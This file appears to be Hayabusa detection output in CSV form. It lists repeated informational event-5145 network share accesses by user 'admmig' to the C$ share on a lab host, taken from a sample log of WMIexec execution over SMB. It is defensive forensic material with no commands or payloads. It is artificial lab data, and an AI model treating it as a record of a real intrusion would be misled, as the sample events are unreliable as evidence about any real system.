2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
